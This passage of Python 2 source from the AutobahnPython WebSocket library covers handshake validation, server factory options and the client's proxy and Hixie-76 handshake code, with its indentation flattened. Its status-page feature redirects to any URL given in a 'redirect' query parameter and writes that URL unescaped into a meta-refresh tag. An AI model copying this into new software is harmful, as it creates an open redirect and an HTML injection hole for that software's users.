end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.externalPort:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.externalPort))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.externalPort == 443) or (not self.factory.isSecure and self.factory.externalPort == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.externalPort, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
if self.http_request_params.has_key('redirect') and len(self.http_request_params['redirect']) > 0:
## To specify a URL for redirection, encode the URL, e.g. from JavaScript:
##
## var url = encodeURIComponent("http://autobahn.ws/python");
##
## and append the encoded string as a query parameter 'redirect'
##
## http://localhost:9000?redirect=http%3A%2F%2Fautobahn.ws%2Fpython
## https://localhost:9000?redirect=https%3A%2F%2Ftwitter.com%2F
##
## This will perform an immediate HTTP-303 redirection. If you provide
## an additional parameter 'after' (int >= 0), the redirection happens
## via Meta-Refresh in the rendered HTML status page, i.e.
##
## https://localhost:9000/?redirect=https%3A%2F%2Ftwitter.com%2F&after=3
##
url = self.http_request_params['redirect'][0]
if self.http_request_params.has_key('after') and len(self.http_request_params['after']) > 0:
after = int(self.http_request_params['after'][0])
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page and meta-refresh-redirecting to %s after %d seconds" % (url, after))
self.sendServerStatus(url, after)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : 303-redirecting to %s" % url)
self.sendRedirect(url)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page")
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
if self.debug:
log.msg("received HTTP request body containing key3 for Hixie-76: %s" % key3)
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or a pair (protocol, headers) or raise an HttpException
##
protocol = None
headers = {}
res = self.onConnect(connectionRequest)
if type(res) == tuple:
if len(res) > 0:
protocol = res[0]
if len(res) > 1:
headers = res[1]
else:
protocol = res
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
## optional, user supplied additional HTTP headers
##
## headers from factory
for uh in self.factory.headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## headers from onConnect
for uh in headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser clients provide the header and expect it to be echoed
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.externalPort))
if (self.factory.isSecure and self.factory.externalPort != 443) or ((not self.factory.isSecure) and self.factory.externalPort != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.externalPort)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
## cancel any opening HS timer if present
##
if self.openHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("openHandshakeTimeoutCall.cancel")
self.openHandshakeTimeoutCall.cancel()
self.openHandshakeTimeoutCall = None
## init state
##
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
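# Worked example for the Hybi accept computation above, using the sample key from
# RFC 6455: for Sec-WebSocket-Key "dGhlIHNhbXBsZSBub25jZQ==", appending the
# protocol magic GUID (WebSocketProtocol._WS_MAGIC,
# "258EAFA5-E914-47DA-95CA-C5AB0DC85B11") and taking base64(sha1(...)) yields
#
#   Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=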
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
"""
Send HTML page HTTP response.
"""
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendRedirect(self, url):
"""
Send HTTP Redirect (303) response.
"""
response = "HTTP/1.1 %d\x0d\x0a" % HTTP_STATUS_CODE_SEE_OTHER[0]
#if self.factory.server is not None and self.factory.server != "":
# response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Location: %s\x0d\x0a" % url.encode("utf-8")
response += "\x0d\x0a"
self.sendData(response)
def sendServerStatus(self, redirectUrl = None, redirectAfter = 0):
"""
Used to send out server status/version upon receiving a HTTP/GET without
WebSocket upgrade header (and option webStatus is True).
"""
if redirectUrl:
redirect = """<meta http-equiv="refresh" content="%d;URL='%s'">""" % (redirectAfter, redirectUrl)
else:
redirect = ""
html = """
<!DOCTYPE html>
<html>
<head>
%s
<style>
body {
color: #fff;
background-color: #027eae;
font-family: "Segoe UI", "Lucida Grande", "Helvetica Neue", Helvetica, Arial, sans-serif;
font-size: 16px;
}
a, a:visited, a:hover {
color: #fff;
}
</style>
</head>
<body>
<h1>AutobahnPython %s</h1>
<p>
I am not a Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws/python">my homepage</a>.
</p>
</body>
</html>
""" % (redirect, __version__)
self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self, url = None, protocols = [], server = "AutobahnPython/%s" % __version__, headers = {}, externalPort = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST provide URL either here or using
:meth:`autobahn.websocket.WebSocketServerFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnPython/x.x.x").
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server, headers, externalPort)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
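# Minimal server setup sketch for this factory, assuming Twisted's reactor and a
# hypothetical protocol class EchoServerProtocol derived from WebSocketServerProtocol:
#
#   factory = WebSocketServerFactory("ws://localhost:9000", debug = False)
#   factory.protocol = EchoServerProtocol
#   reactor.listenTCP(9000, factory)
#   reactor.run()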
def setSessionParameters(self, url = None, protocols = [], server = None, headers = {}, externalPort = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
self.headers = headers
self.externalPort = externalPort if externalPort is not None else self.port
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
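# Usage sketch for adjusting the defaults set above, e.g. to accept Hixie-76
# clients and auto-fragment large outgoing messages (the concrete values are
# illustrative only):
#
#   factory.setProtocolOptions(allowHixie76 = True,
#                              autoFragmentSize = 65536,
#                              openHandshakeTimeout = 10)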
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSocket protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when a mask is present. Applies to outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing a closing handshake (default: True).
:type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSocket protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
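## Illustrative usage (editorial addition, not part of the original Autobahn
## source; URL and limits below are example values only) -- a server factory's
## defaults are typically tightened right after construction:
##
## factory = WebSocketServerFactory("ws://localhost:9000")
## factory.setProtocolOptions(versions = [13, 8],
## webStatus = False,
## maxFramePayloadSize = 65536,
## maxMessagePayloadSize = 1048576)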
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
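## Illustrative usage (editorial addition, not part of the original source):
## the server factory above is normally bound to a listening port through the
## Twisted reactor; the protocol class name here is a placeholder:
##
## from twisted.internet import reactor
## factory = WebSocketServerFactory("ws://localhost:9000")
## factory.protocol = MyServerProtocol # a WebSocketServerProtocol subclass
## reactor.listenTCP(factory.port, factory)
## reactor.run()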
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSocket.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake (or proxy connect).
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
if not self.isServer and self.factory.proxy is not None:
## start by doing a HTTP/CONNECT for explicit proxies
self.startProxyConnect()
else:
## immediately start with the WebSocket opening handshake
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def startProxyConnect(self):
"""
Connect to explicit proxy.
"""
## construct proxy connect HTTP request
##
request = "CONNECT %s:%d HTTP/1.1\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "\x0d\x0a"
if self.debug:
log.msg(request)
self.sendData(request)
def processProxyConnect(self):
"""
Process HTTP/CONNECT response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % http_response_data)
## extract HTTP status line and headers
##
(http_status_line, http_headers, http_headers_cnt) = parseHttpHeader(http_response_data)
## validate proxy connect response
##
if self.debug:
log.msg("received HTTP status line for proxy connect request : %s" % str(http_status_line))
log.msg("received HTTP headers for proxy connect request : %s" % str(http_headers))
## Response Line
##
sl = http_status_line.split()
if len(sl) < 2:
return self.failProxyConnect("Bad HTTP response status line '%s'" % http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failProxyConnect("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failProxyConnect("Bad HTTP status code ('%s')" % sl[1].strip())
if not (status_code >= 200 and status_code < 300):
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failProxyConnect("HTTP proxy connect failed (%d%s)" % (status_code, reason))
## Ok, got complete response for HTTP/CONNECT, remember rest (if any)
##
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_CONNECTING
## process rest of buffered data, if any
##
if len(self.data) > 0:
self.consumeData()
## now start WebSocket opening handshake
##
self.startHandshake()
def failProxyConnect(self, reason):
"""
During initial explicit proxy connect, the server response indicates some failure and we drop the
connection.
"""
if self.debug:
log.msg("failing proxy connect ('%s')" % reason)
self.dropConnection(abort = True)
def createHixieKey(self):
"""
Generate a Hixie-76 opening handshake key (and the number encoded in it),
following the rather convoluted algorithm specified in:
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSocket opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## this seems to prohibit some non-compliant proxies from removing the
## connection "Upgrade" header
## See also:
## http://www.ietf.org/mail-archive/web/hybi/current/msg09841.html
## http://code.google.com/p/chromium/issues/detail?id=148908
##
request += "Pragma: no-cache\x0d\x0a"
request += "Cache-Control: no-cache\x0d\x0a"
## optional, user supplied additional HTTP headers
##
for uh in self.factory.headers.items():
request += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
